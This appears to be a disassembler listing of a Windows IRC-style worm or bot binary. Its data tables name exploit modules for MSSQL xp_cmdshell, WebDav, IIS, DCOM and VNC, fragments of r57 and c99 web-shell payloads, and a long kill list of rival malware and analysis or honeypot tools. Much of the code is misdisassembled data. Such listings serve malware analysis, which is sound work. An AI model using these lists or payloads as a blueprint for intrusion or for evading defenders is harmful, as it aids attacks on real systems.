dd offset aPnp_b ; "PNP.b"
dd offset a8d9f4e40A03d11 ; "8d9f4e40-a03d-11ce-8f69-08003e30051b"
dd offset aMssql_a ; "MSSQL.A"
dd offset aThcthcthcthcth ; "THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"...
dd offset aMssql_b ; "MSSQL.B"
dd offset aExecMaster__xp ; "EXEC master..xp_cmdshell"
dd offset aWebdav ; "WebDav"
dd offset loc_44D188
dd offset aRxMain ; "Rx Main"
dd offset aMain ; "[MAIN]: "
dd offset aIis5ssl ; "IIS5SSL"
dd offset byte_44D15C
dd offset aVncscan ; "VNCScan"
dd offset aSystemrootSyst ; "%systemroot%\\system32\\cmd.exe"
dd offset aNetdevil ; "NetDevil"
dd offset aPleaz_runS ; "pleaz_run%s"
dd offset aOptix ; "Optix"
dd offset a022moptestmv1_ ; "022¬OPtest¬v1.1\r\n"
dd offset loc_44D0F3+5
dd offset loc_44D0EF+1
dd offset aOld4444shell ; "Old4444Shell"
dd offset loc_44D0D4
dd offset dword_44D0C8
dd offset dword_44D0B4
dd offset dword_44D0A4
dd offset loc_44D090
dd offset dword_44D080
dd offset loc_44D06C
dd offset dword_44D05C
dd offset dword_44D048
dd offset dword_44D03C
dd offset loc_44D024
dd offset aBobic_a ; "Bobic.A"
dd offset aOsamaBinLadenC ; "Osama Bin Laden Captured."
dd offset aBobic_b ; "Bobic.B"
dd offset aDonateToTheHur ; "Donate to the Hurricane Katrina relief "...
dd offset aBeagle ; "Beagle"
dd offset dword_44CFAC
dd offset aMsblast ; "MsBlast"
dd offset aWindowsupdate_ ; "windowsupdate.com"
dd offset aLowerzones ; "LowerZones"
dd offset aSoftwareMicr_6 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aHiderGui ; "Hider-Gui"
dd offset aSoftwareAdrian ; "Software\\Adrian Lopez\\HideWindow\\Prefer"...
dd offset aHiderun ; "HideRun"
dd offset aHiderunHiddenA ; "HideRun -- hidden application launcher."...
dd offset aR57 ; "r57"
dd offset aI2luy2x1zgugph ; "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA"...
dd offset aC99 ; "c99"
dd offset aR0lgodlhfaauak ; "R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaG"...
dd offset aDcomOldScan ; "Dcom-Old-Scan"
dd offset aPipeEpmapper ; "pipe\\epmapper\\"
dd offset aNircomline ; "NirComLine"
dd offset aNircomline ; "NirComLine"
dd offset aMsnbot_a ; "MSNBot.a"
; ---------------------------------------------------------------------------
cmp ch, cl
inc esp
add ds:0CCF00044h[ecx*8], ch
inc esp
add al, ah
int 3 ; Trap to Debugger
inc esp
add [esp+ecx*8-335BFFBCh], dh
inc esp
add [esp+ecx*8+44h], ch
add [esp+ecx*8+44h], bl
add [esp+ecx*8], ch
inc esp
add [eax], bl
int 3 ; Trap to Debugger
inc esp
add [eax+740044CBh], al
retf
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
push 5C0044CBh
retf
; ---------------------------------------------------------------------------
dw 44h
dd offset aMsdirectx_sys ; "msdirectx.sys"
; ---------------------------------------------------------------------------
xor al, 0CBh
inc esp
add [eax], cl
retf
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
cld
retf 44h
; ---------------------------------------------------------------------------
mov al, 0CAh
inc esp
add [eax+6C0044CAh], ah
retf 44h
; ---------------------------------------------------------------------------
pop esp
retf 44h
; ---------------------------------------------------------------------------
inc eax
retf 44h
; ---------------------------------------------------------------------------
dd offset dword_44CA30
dd offset loc_44CA1C
dd offset aNtbot_a ; "NTBot.A"
dd offset aStaticConstUns ; "static const unsigned long crc32tab[256"...
dd offset aNtbot_b ; "NTBot.B"
dd offset aExploitingSUse ; "(Exploiting: %s User: %s / Pass: %s\r\n)"
dd offset dword_44C9A8
dd offset dword_44C984
dd offset dword_44C978
dd offset dword_44C960
dd 2 dup(0)
off_447E48 dd offset a_tmp_exe_0 ; DATA XREF: sub_41F02F+1FE�r
; sub_41F02F+274�r
; "*.tmp.exe"
dd offset a_tmp_exe ; "*.TMP.EXE"
dd offset aEraseme_exe_1 ; "eraseme*.exe"
dd offset aEraseme_exe_0 ; "ERASEME*.EXE"
dd offset aSsms_exe ; "ssms.exe"
dd offset aMsile_exe ; "msile.exe"
dd offset aWorm32_exe_0 ; "worm32.exe"
dd offset aPenis_exe ; "penis.exe"
dd offset aPenis32_exe_0 ; "penis32.exe"
dd offset aMsblast_exe_0 ; "msblast.exe"
dd offset aKernel32_exe_0 ; "kernel32.exe"
dd offset aSvhost_exe_0 ; "svhost.exe"
dd offset aAlgs_exe ; "algs.exe"
dd offset aFun_exe ; "fun.exe"
dd offset aSpooisv_exe_0 ; "spooisv.exe"
dd offset aSysmgr_exe ; "sysmgr.exe"
dd offset aSmsc32_exe ; "smsc32.exe"
dd offset aMsrsys32_exe ; "msrsys32.exe"
dd offset a1sass_exe ; "1sass.exe"
dd offset aIsass_exe_0 ; "isass.exe"
dd offset aWiniogon_exe_0 ; "winiogon.exe"
dd offset aSvchost32_ex_0 ; "svchost32.exe"
dd offset aHosts_exe ; "hosts.exe"
dd offset aKspoold_exe ; "kspoold.exe"
dd offset aCmd32_exe ; "cmd32.exe"
dd offset aWgareg_exe_0 ; "wgareg.exe"
dd offset aWgavm_exe_0 ; "wgavm.exe"
dd offset aMsr_exe ; "msr.exe"
dd offset aNtdll64_exe ; "ntdll64.exe"
dd offset aIpcscan_exe ; "ipcscan.exe"
dd offset aSvhcost_exe ; "svhcost.exe"
dd offset aRas2_exe ; "ras2.exe"
dd offset aX_exe ; "x.exe"
dd offset aSavenow_exe ; "savenow.exe"
dd offset aMsappview32_ex ; "MSAPPVIEW32.EXE"
dd offset aScrtkfg_exe ; "SCRTKFG.EXE"
dd offset aC27d8fefD7ae42 ; "C27D8FEF-D7AE-42C0-82E6-F30598265639.EX"...
dd offset aWorm32_exe ; "WORM32.EXE"
dd offset aPenis32_exe ; "PENIS32.EXE"
dd offset aIexplor_exe ; "IEXPLOR.EXE"
dd offset aIexplore6_exe ; "IEXPLORE6.EXE"
dd offset aIexplore7_exe ; "IEXPLORE7.EXE"
dd offset aExxplorer_exe ; "EXXPLORER.EXE"
dd offset aBotpacked_exe ; "BOTPACKED.EXE"
dd offset aSvcchosst_exe ; "SVCCHOSST.EXE"
dd offset aSys32_exe ; "SYS32.EXE"
dd offset aShost_exe ; "SHOST.EXE"
dd offset aSass_exe ; "SASS.EXE"
dd offset aSeekmo_exe ; "SEEKMO.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSvhostcs32_exe ; "SVHOSTCS32.EXE"
dd offset aSvhost32_exe ; "SVHOST32.EXE"
dd offset aRbot_exe ; "RBOT.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvchost32_exe ; "SVCHOST32.EXE"
dd offset aOwinssap_exe ; "OWINSSAP.EXE"
dd offset aWnl_exe ; "WNL.EXE"
dd offset aCrssr_exe ; "CRSSR.EXE"
dd offset aBling_exe ; "BLING.EXE"
dd offset aGreen_exe ; "GREEN.EXE"
dd offset aUpdate32_exe ; "UPDATE32.EXE"
dd offset aWinrarx_exe ; "WINRARX.EXE"
dd offset aMsie701_exe ; "MSIE701.EXE"
dd offset aServ454_exe ; "SERV454.EXE"
dd offset aDll64_exe ; "DLL64.EXE"
; ---------------------------------------------------------------------------
clc
lds eax, [eax+eax-10h]
lds eax, [eax+eax-1Ch]
lds eax, [eax+eax-28h]
lds eax, [eax+eax-38h]
lds eax, [eax+eax-44h]
lds eax, [eax+eax-50h]
lds eax, [eax+eax-60h]
lds eax, [eax+eax-6Ch]
lds eax, [eax+eax-7Ch]
lds eax, [eax+eax+78h]
lds eax, [eax+eax+6Ch]
lds eax, [eax+eax+60h]
lds eax, [eax+eax+58h]
lds eax, [eax+eax+4Ch]
lds eax, [eax+eax+3Ch]
lds eax, [eax+eax+2Ch]
lds eax, [eax+eax+20h]
lds eax, [eax+eax+14h]
lds eax, [eax+eax+8]
lds eax, [eax+eax-8]
les eax, [eax+eax-14h]
les eax, [eax+eax-20h]
les eax, [eax+eax-2Ch]
les eax, [eax+eax-38h]
les eax, [eax+eax-48h]
les eax, [eax+eax-58h]
les eax, [eax+eax-64h]
les eax, [eax+eax-6Ch]
les eax, [eax+eax-78h]
les eax, [eax+eax+7Ch]
les eax, [eax+eax+70h]
les eax, [eax+eax+64h]
les eax, [eax+eax+58h]
les eax, [eax+eax+48h]
les eax, [eax+eax+38h]
les eax, [eax+eax+2Ch]
les eax, [eax+eax+1Ch]
les eax, [eax+eax+0Ch]
les eax, [eax+eax-4]
retn
; ---------------------------------------------------------------------------
dw 44h
dd offset aSxserv101_exe ; "SXSERV101.EXE"
; ---------------------------------------------------------------------------
fadd st(3), st
inc esp
add ah, cl
retn
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
rol bl, 44h
add [eax-5FFFBB3Dh], dh
retn
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
xchg eax, esp
retn
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
mov bl, al
inc esp
add [ebx+eax*8+44h], dh
add [eax-3Dh], ch
inc esp
add [eax-3Dh], bl
inc esp
add [ebx+eax*8+44h], cl
add [eax-3Dh], al
inc esp
add [eax], dh
retn
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
and bl, al
inc esp
add [ebx+eax*8], dl
inc esp
add [ebx+eax*8], al
inc esp
add al, bh
retn 44h
; ---------------------------------------------------------------------------
dd offset aMsJava_exe ; "MS-JAVA.EXE"
dd offset aMsjava_exe ; "MSJAVA.EXE"
; ---------------------------------------------------------------------------
aam 0C2h
inc esp
add al, cl
retn 44h
; ---------------------------------------------------------------------------
mov eax, 0AC0044C2h
retn 44h
; ---------------------------------------------------------------------------
mov al, ds:940044C2h
retn 44h
; ---------------------------------------------------------------------------
test al, dl
inc esp
add [eax-3Eh], bh
inc esp
add [eax-3Eh], ch
inc esp
add [eax-3Eh], bl
inc esp
add [eax-3Eh], cl
inc esp
add [edx+eax*8], bh
inc esp
add [edx+eax*8], ch
inc esp
add [eax], ah
retn 44h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc esp
add [eax], cl
retn 44h
; ---------------------------------------------------------------------------
dd offset aScrhost_exe ; "SCRHOST.EXE"
dd offset aBingoo_exe ; "BINGOO.EXE"
dd offset aBingo_exe ; "BINGO.EXE"
dd offset aWks_exe ; "WKS.EXE"
dd offset aSvhostcs32_exe ; "SVHOSTCS32.EXE"
dd offset aNtsf_exe ; "NTSF.EXE"
dd offset aSpoolss_exe ; "SPOOLSS.EXE"
dd offset aMysvcc_exe ; "MYSVCC.EXE"
dd offset aSerrv_exe ; "SERRV.EXE"
dd offset aWinsys_32_exe ; "WINSYS_32.EXE"
dd offset aSserrvv_exe ; "SSERRVV.EXE"
dd offset aWinsockx32_exe ; "WINSOCKX32.EXE"
dd offset aNetmsn_exe ; "NETMSN.EXE"
dd offset aMsdevelop_exe ; "MSDEVELOP.EXE"
dd offset aLsass32_exe ; "LSASS32.EXE"
dd offset aWinrpc_exe ; "WINRPC.EXE"
dd offset aSys_exe ; "SYS.EXE"
dd offset aWinupd_exe ; "WINUPD.EXE"
dd offset aSyser_exe ; "SYSER.EXE"
dd offset aAkwid_exe ; "AKWID.EXE"
dd offset aAk_exe ; "AK.EXE"
dd offset aWinl0gon_exe ; "WINL0GON.EXE"
dd offset aWinl0gin_exe ; "WINL0GIN.EXE"
dd offset aWinlogon32_exe ; "WINLOGON32.EXE"
dd offset aYesbron_com ; "YESBRON.COM"
dd offset aMsmpls_exe ; "MSMPLS.EXE"
dd offset aMsnplus_exe ; "MSNPLUS.EXE"
dd offset aTmrservice_exe ; "TMRSERVICE.EXE"
dd offset aInstall_sp_exe ; "INSTALL_SP.EXE"
dd offset aAlg32_exe ; "ALG32.EXE"
dd offset aMsnupdate_exe ; "MSNUPDATE.EXE"
dd offset aMsnupdater_exe ; "MSNUPDATER.EXE"
dd offset aMsner_exe ; "MSNER.EXE"
dd offset aMsmmsgr_exe ; "MSMMSGR.EXE"
dd offset aMsnmsgrr_exe ; "MSNMSGRR.EXE"
dd offset aSpoolv_exe ; "SPOOLV.EXE"
dd offset aSpoolvs_exe ; "SPOOLVS.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aSssvhost_exe ; "SSSVHOST.EXE"
dd offset aLsass_32_exe ; "LSASS_32.EXE"
dd offset aIiexplore_exe ; "IIEXPLORE.EXE"
dd offset aIiexplorer_exe ; "IIEXPLORER.EXE"
dd offset aAsn1sys_exe ; "ASN1SYS.EXE"
dd offset aWgareg_exe ; "WGAREG.EXE"
dd offset aServices32_exe ; "SERVICES32.EXE"
dd offset aMicrosoft_exe ; "MICROSOFT.EXE"
dd offset aLinewsrv_exe ; "LINEWSRV.EXE"
dd offset aWinime_exe ; "WINIME.EXE"
dd offset aWservice_exe ; "WSERVICE.EXE"
dd offset aWservices_exe ; "WSERVICES.EXE"
dd offset aScsrc_exe ; "SCSRC.EXE"
dd offset aWinsvc_exe ; "WINSVC.EXE"
dd offset aWin32update_ex ; "WIN32UPDATE.EXE"
dd offset aDnssrv_exe ; "DNSSRV.EXE"
dd offset aDnssvc_exe ; "DNSSVC.EXE"
dd offset aDns32_exerxbot ; "DNS32.EXERXBOT.EXE"
dd offset aCrxbot_exe ; "CRXBOT.EXE"
dd offset aBot_exe ; "BOT.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aW32gen_exe ; "W32GEN.EXE"
dd offset aTaskmngr32_exe ; "TASKMNGR32.EXE"
; ---------------------------------------------------------------------------
fdivr qword ptr [esi-412BFFBCh]
inc esp
add ah, al
mov esi, 0BEB80044h
inc esp
add [esi+edi*4-415FFFBCh], ch
inc esp
add [esi+edi*4-4177FFBCh], dl
inc esp
add [esi+edi*4+44h], bh
add [eax-42h], dh
inc esp
add [eax-42h], ah
inc esp
add [esi+edi*4+44h], dl
add [esi+edi*4+44h], al
add [ebp+eax*8-41CBFFBCh], al
inc esp
add [eax], ch
mov esi, 0BE1C0044h
inc esp
add [eax], dl
mov esi, 0C4F80044h
inc esp
add [esi+edi*4], al
inc esp
add al, bh
mov ebp, 0BDEC0044h
inc esp
add ah, bl
mov ebp, 0BDCC0044h
inc esp
add [ebp+edi*4-424FFFBCh], bh
inc esp
add [ebp+edi*4-4267FFBCh], ah
inc esp
add [eax+7C0044BDh], cl
mov ebp, 0BD700044h
inc esp
add [ebp+edi*4+44h], ah
add [eax-43h], bl
inc esp
add [eax-43h], dl
inc esp
add [eax-43h], al
inc esp
add [eax], dh
mov ebp, 0BD240044h
inc esp
add [eax], bl
mov ebp, 0BD0C0044h
inc esp
add ah, bh
mov esp, 0BCF00044h
inc esp
add al, ah
mov esp, 0BCD40044h
inc esp
add al, cl
mov esp, 0C5F00044h
inc esp
add [esp+edi*4-4353FFBCh], bh
inc esp
add [esp+edi*4-39DBFFBCh], bl
inc esp
add [esp+edi*4-4383FFBCh], cl
inc esp
add [esp+edi*4+44h], ch
add [eax-44h], ah
inc esp
add [esp+edi*4+44h], dl
add [eax-44h], cl
inc esp
add [esp+edi*4], bh
inc esp
add [eax], dh
mov esp, 0BC200044h
inc esp
add [esp+edi*4], dl
inc esp
add [eax], cl
mov esp, 0BBFC0044h
inc esp
add ah, dh
mov ebx, 0BBEC0044h
inc esp
add al, ah
mov ebx, 0BBD40044h
inc esp
add ah, cl
mov ebx, 0C5E40044h
inc esp
add al, al
mov ebx, 0BBB40044h
inc esp
add [eax-63FFBB45h], ch
mov ebx, 0BB900044h
inc esp
add [ebx+edi*4-4487FFBCh], al
inc esp
add [eax-45h], ch
inc esp
add [ebx+edi*4+44h], bl
add [eax-45h], dl
inc esp
add [ebx+edi*4+44h], al
add [eax], bh
mov ebx, 0BB2C0044h
inc esp
add ah, dl
retn 44h
; ---------------------------------------------------------------------------
dd offset aWinsys_exe ; "WINSYS.EXE"
dd offset aWinz_exe ; "WINZ.EXE"
dd offset aXml_exe ; "XML.EXE"
dd offset aXml32_exe ; "XML32.EXE"
dd offset aLansas_exe ; "LANSAS.EXE"
dd offset aWuamgr_exe ; "WUAMGR.EXE"
; ---------------------------------------------------------------------------
fdivr qword ptr [edx-4533FFBCh]
inc esp
add al, al
mov edx, 0BAB40044h
inc esp
add [edx+edi*4-4567FFBCh], ah
inc esp
add [eax+7C0044BAh], cl
mov edx, 0BA700044h
inc esp
add [edx+edi*4+44h], ah
add [eax-46h], bl
inc esp
add [edx+edi*4+44h], cl
add [edx+edi*4], bh
inc esp
add [edx+edi*4], ch
inc esp
add [eax], ah
mov edx, 0BA140044h
inc esp
add [eax], cl
mov edx, 0B9F80044h
inc esp
add ah, ch
mov ecx, 0B9E00044h
inc esp
add ah, dl
mov ecx, 0B9C80044h
inc esp
add [eax-57FFBB47h], bh
mov ecx, 0B9980044h
inc esp
add [eax+7C0044B9h], cl
mov ecx, 0B9700044h
inc esp
add [ecx+edi*4+44h], ah
add [eax-47h], bl
inc esp
add [ecx+edi*4+44h], cl
add [eax-47h], al
inc esp
add [ecx+edi*4], dh
inc esp
add [ecx+edi*4], ch
inc esp
add [eax], ah
mov ecx, 0B9100044h
inc esp
add ah, bh
retn
; ---------------------------------------------------------------------------
dw 44h
dd offset aMsnmgr12_exe ; "MSNMGR12.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aMstskmgr_exe ; "MSTSKMGR.EXE"
dd offset aVcmon_exe ; "VCMON.EXE"
dd offset aSsc_exe ; "SSC.EXE"
dd offset aLoadadv642_exe ; "LOADADV642.EXE"
dd offset aCcupdate_exe ; "CCUPDATE.EXE"
dd offset a568_exe ; "568.EXE"
dd offset aSpool_exe ; "SPOOL.EXE"
dd offset aSusp_exe ; "SUSP.EXE"
dd offset aIexplores_exe ; "IEXPLORES.EXE"
dd offset aDll32_exe ; "DLL32.EXE"
dd offset aReg32_exe ; "REG32.EXE"
dd offset aSvcdata_exe ; "SVCDATA.EXE"
dd offset aSysmonxp_exe ; "SYSMONXP.EXE"
dd offset aWinupd_exe ; "WINUPD.EXE"
dd offset aMsn_update_exe ; "MSN_UPDATE.EXE"
dd offset aWinupdtsrv_exe ; "WINUPDTSRV.EXE"
dd offset aNl210_bat ; "NL210.BAT"
; ---------------------------------------------------------------------------
lodsb
retn 44h
; ---------------------------------------------------------------------------
dd offset aIsmini_exe ; "ISMINI.EXE"
dd offset aIshost_exe ; "ISHOST.EXE"
dd offset aMssdev_exe ; "MSSDEV.EXE"
dd offset aIi_exe ; "II.EXE"
dd offset aNewbot_exe ; "NEWBOT.EXE"
dd offset aSchost_exe ; "SCHOST.EXE"
dd offset aWindowantasdiv ; "WINDOWANTASDIVRI.EXE"
dd offset aCtfmom_exe ; "CTFMOM.EXE"
dd offset aRecsl_exe ; "RECSL.EXE"
dd offset aInternet_exe ; "INTERNET.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWuaumqr1_exe ; "WUAUMQR1.EXE"
dd offset aQtask_exe ; "QTASK.EXE"
dd offset aSmsc_exe ; "SMSC.EXE"
dd offset aCmh_exe ; "CMH.EXE"
dd offset aTskmagr_exe ; "TSKMAGR.EXE"
dd offset aEraseme_exe ; "ERASEME.EXE"
dd offset aMessengerr_exe ; "MESSENGERR.EXE"
dd offset aQkkku_exe ; "QKKKU.EXE"
dd offset aWindowsvista_e ; "WINDOWSVISTA.EXE"
dd offset aMswins_exe ; "MSWINS.EXE"
dd offset aMyhost_exe ; "MYHOST.EXE"
dd offset aBsdmpldrvr642_ ; "BSDMPLDRVR642.EXE"
dd offset aRp5_exe ; "RP5.EXE"
dd offset aSvcvhost_exe ; "SVCVHOST.EXE"
dd offset aJswtss_exe ; "JSWTSS.EXE"
dd offset aWaucult_exe ; "WAUCULT.EXE"
dd offset aMsssmsngr6417_ ; "MSSSMSNGR6417.EXE"
dd offset aWinmpat_exe ; "WINMPAT.EXE"
dd offset aSvhostcs32_exe ; "SVHOSTCS32.EXE"
dd offset aWinpooch_exe ; "WINPOOCH.EXE"
dd offset aRundil_exe ; "RUNDIL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aAg_exe ; "AG.EXE"
dd offset aA_bat ; "A.BAT"
dd offset aHbot_exe ; "HBOT.EXE"
dd offset aDbot_exe ; "DBOT.EXE"
dd offset aZz_exe ; "ZZ.EXE"
dd offset aTcpview_exe ; "TCPVIEW.EXE"
dd offset aTcpviewpro_exe ; "TCPVIEWPRO.EXE"
dd offset aTcpdump_exe ; "TCPDUMP.EXE"
dd offset aTcpmon_exe ; "TCPMON.EXE"
dd offset aTcpstat_exe ; "TCPSTAT.EXE"
dd offset aTcpstats_exe ; "TCPSTATS.EXE"
dd offset aSharemon_exe ; "SHAREMON.EXE"
dd offset aHostmon_exe ; "HOSTMON.EXE"
dd offset aWinsniff_exe ; "WINSNIFF.EXE"
dd offset aRegmon_exe ; "REGMON.EXE"
dd offset aProcexp_exe ; "PROCEXP.EXE"
dd offset aPortmon_exe ; "PORTMON.EXE"
dd offset aFilemon_exe ; "FILEMON.EXE"
dd offset aFport_exe ; "FPORT.EXE"
dd offset aTlist_exe ; "TLIST.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcdump32_exe ; "PROCDUMP32.EXE"
dd offset aPexplorer_exe ; "PEXPLORER.EXE"
dd offset aNetworkactivpi ; "NETWORKACTIVPIAFCTMV1.5.EXE"
dd offset aXdcc_install_e ; "XDCC_INSTALL.EXEDD.EXE"
dd offset aAoautoupdatena ; "AOAUTOUPDATENAV.EXE"
dd offset aCash_exe ; "CASH.EXE"
dd offset a0cash_exe ; "0CASH.EXE"
dd offset aCash7oc_jpg ; "CASH7OC.JPG"
dd offset aLogix_exe ; "LOGIX.EXE"
dd offset a2pac_exe ; "2PAC.EXE"
dd offset aOp_exe ; "OP.EXE"
dd offset aOoooo_exe ; "OOOOO.EXE"
dd offset aOooo_exe ; "OOOO.EXE"
dd offset aDgjdjg_exe ; "DGJDJG.EXE"
dd offset aArabz_exe ; "ARABZ.EXE"
dd offset aArabian_exe ; "ARABIAN.EXE"
dd offset aTbar_exe ; "TBAR.EXE"
dd offset aPusu_exe ; "PUSU.EXE"
dd offset aNaab_exe ; "NAAB.EXE"
dd offset aFtpit_exe ; "FTPIT.EXE"
dd offset aIcmd_exe ; "ICMD.EXE"
dd offset aXssh_exe ; "XSSH.EXE"
dd offset aTcpshell_exe ; "TCPSHELL.EXE"
dd offset aHidden32_exe ; "HIDDEN32.EXE"
dd offset aHiderun_exe ; "HIDERUN.EXE"
dd offset aHidden32_exe ; "HIDDEN32.EXE"
dd offset aHidden_exe ; "HIDDEN.EXE"
dd offset aHide_exe ; "HIDE.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aBlast_exe ; "BLAST.EXE"
dd offset aSasser_exe ; "SASSER.EXE"
dd offset aSassere_exe ; "SASSERE.EXE"
dd offset aScrhost32_exe ; "SCRHOST32.EXE"
dd offset aWuamgrd_exe ; "WUAMGRD.EXE"
dd offset aWuamgre_exe ; "WUAMGRE.EXE"
dd offset aWins32_exe ; "WINS32.EXE"
dd offset aZfr_exe ; "ZFR.EXE"
dd offset aZf_exe ; "ZF.EXE"
dd offset aSvchost32_exe ; "SVCHOST32.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aIexpl0re_exe ; "IEXPL0RE.EXE"
dd offset aSvcost_exe ; "SVCOST.EXE"
dd offset aSvhost_exe ; "SVHOST.EXE"
dd offset aSvhosts_exe ; "SVHOSTS.EXE"
dd offset aSvch0st32_exe ; "SVCH0ST32.EXE"
dd offset aScrh0st_exe ; "SCRH0ST.EXE"
dd offset aWuamkoppnp_exe ; "WUAMKOPPNP.EXE"
dd offset aSpoolss_exe ; "SPOOLSS.EXE"
dd offset aSysinfo_exe ; "SYSINFO.EXE"
dd offset aAddiq32_exe ; "ADDIQ32.EXE"
dd offset aNtsf_exe ; "NTSF.EXE"
dd offset aWindows_update ; "WINDOWS_UPDATER01.EXE"
dd offset aQq_exe ; "QQ.EXE"
dd offset aIexploree_exe ; "IEXPLOREE.EXE"
dd offset aCrss32_exe ; "CRSS32.EXE"
dd offset aSpool32_exe ; "SPOOL32.EXE"
dd offset aSpools32_exe ; "SPOOLS32.EXE"
dd offset aRun0nce_exe ; "RUN0NCE.EXE"
dd offset aMsdev32_exe ; "MSDEV32.EXE"
dd offset aPostcard_exe ; "POSTCARD.EXE"
dd offset aFoods_exe ; "FOODS.EXE"
dd offset aMswin32 ; "MSWIN32"
dd offset aHide_exe ; "HIDE.EXE"
dd offset aTaskhider_exe ; "TASKHIDER.EXE"
dd offset aNi_exe ; "NI.EXE"
dd offset aRview_exe ; "RVIEW.EXE"
dd offset aRadmin21_exe ; "RADMIN21.EXE"
dd offset aRadmin22_exe ; "RADMIN22.EXE"
dd offset aWsg32_exe ; "WSG32.EXE"
dd offset aXtc_exe ; "XTC.EXE"
dd offset aCiao_exe ; "CIAO.EXE"
dd offset aRdr32_exe ; "RDR32.EXE"
dd offset aWrapper_exe ; "WRAPPER.EXE"
dd offset aStub_exe ; "STUB.EXE"
dd offset aTemp_exe ; "TEMP.EXE"
dd offset aDftpd_exe ; "DFTPD.EXE"
dd offset aWinmaster_exe ; "WINMASTER.EXE"
dd offset aSlave_exe ; "SLAVE.EXE"
dd offset aSlave32_exe ; "SLAVE32.EXE"
dd offset aWinslave_exe ; "WINSLAVE.EXE"
dd offset aKralor_exehaxo ; "KRALOR.EXEHAXOR.EXE"
dd offset aMykralor_exe ; "MYKRALOR.EXE"
dd offset aAcc3pt_exe ; "ACC3PT.EXE"
dd offset aBeast_exe ; "BEAST.EXE"
dd offset aTq_exe ; "TQ.EXE"
dd offset aVirus_exe ; "VIRUS.EXE"
dd offset aVirus32_exe ; "VIRUS32.EXE"
dd offset aHoneyd_exe ; "HONEYD.EXE"
dd offset aHoneywall_exe ; "HONEYWALL.EXE"
dd offset aSebek_exe ; "SEBEK.EXE"
dd offset aSelebek_exe ; "SELEBEK.EXE"
dd offset aAntibotty_exe ; "ANTIBOTTY.EXE"
dd offset aSysd32_exe ; "SYSD32.EXE"
dd offset aRoo_exe ; "ROO.EXE"
dd offset aRoo32_exe ; "ROO32.EXE"
dd offset aHoney_exe ; "HONEY.EXE"
dd offset aTrojan_exe ; "TROJAN.EXE"
dd offset aSub7_exe ; "SUB7.EXE"
dd offset aBd_exe ; "BD.EXE"
dd offset aDoor_exe ; "DOOR.EXE"
dd offset aOmfglol_exe ; "OMFGLOL.EXE"
dd offset aOwned_exe ; "OWNED.EXE"
dd offset a1_exe ; "1.EXE"
dd offset a6_exe ; "6.EXE"
dd offset aDiablo_exe ; "DIABLO.EXE"
dd offset aDiabl0_exe ; "DIABL0.EXE"
dd offset aRunthis_exe ; "RUNTHIS.EXE"
dd offset aKit_exe ; "KIT.EXE"
dd offset aXdcckit_exe ; "XDCCKIT.EXE"
dd offset aXd_exe ; "XD.EXE"
dd offset aIcmd_exe ; "ICMD.EXE"
dd offset aHxdef100_exe ; "HXDEF100.EXE"
dd offset aBdcli100_exe ; "BDCLI100.EXE"
dd offset aRdrbs100_exe ; "RDRBS100.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aHxgold_exe ; "HXGOLD.EXE"
dd offset aHxdef073_exe ; "HXDEF073.EXE"
dd offset aBdcli073_exe ; "BDCLI073.EXE"
dd offset aRdrbs073_exe ; "RDRBS073.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aKeylogger_exe ; "KEYLOGGER.EXE"
dd offset aKeylog_exe ; "KEYLOG.EXE"
dd offset aKeylogg_exe ; "KEYLOGG.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aMsantispy_exe ; "MSANTISPY.EXE"
dd offset aAntispy_exe ; "ANTISPY.EXE"
dd offset aWinmrt_exe ; "WINMRT.EXE"
dd offset aWinmrt32_exe ; "WINMRT32.EXE"
dd offset aRcc_exe ; "RCC.EXE"
dd offset aIroffer_exe ; "IROFFER.EXE"
dd offset aIrbot_exe ; "IRBOT.EXE"
dd offset aOffer_exe ; "OFFER.EXE"
dd offset aIrxdcc_exe ; "IRXDCC.EXE"
dd offset aSdbot_exe ; "SDBOT.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aSdbot05b_exe ; "SDBOT05B.EXE"
dd offset aSdbot05c_exe ; "SDBOT05C.EXE"
dd offset aT_bat ; "T.BAT"
dd offset aHax_exe ; "HAX.EXE"
dd offset aMsn_exe ; "MSN.EXE"
dd offset a101_exe ; "101.EXE"
dd offset aClass101_exe ; "CLASS101.EXE"
dd offset aSocks_exe ; "SOCKS.EXE"
dd offset aSox_exe ; "SOX.EXE"
dd offset aSockets_exe ; "SOCKETS.EXE"
dd offset aS0cks_exe ; "S0CKS.EXE"
dd offset aMsserv_exe ; "MSSERV.EXE"
dd offset aConvertxdccfil ; "CONVERTXDCCFILE.EXE"
dd offset aWinreg32_exe ; "WINREG32.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aXftp_exe ; "XFTP.EXE"
dd offset aWebx_exe ; "WEBX.EXE"
dd offset aWebdownloader_ ; "WEBDOWNLOADER.EXE"
dd offset aSyst3m33r_exe ; "SYST3M33R.EXE"
dd offset aAgobot_exe ; "AGOBOT.EXE"
dd offset aAgobot3_exe ; "AGOBOT3.EXE"
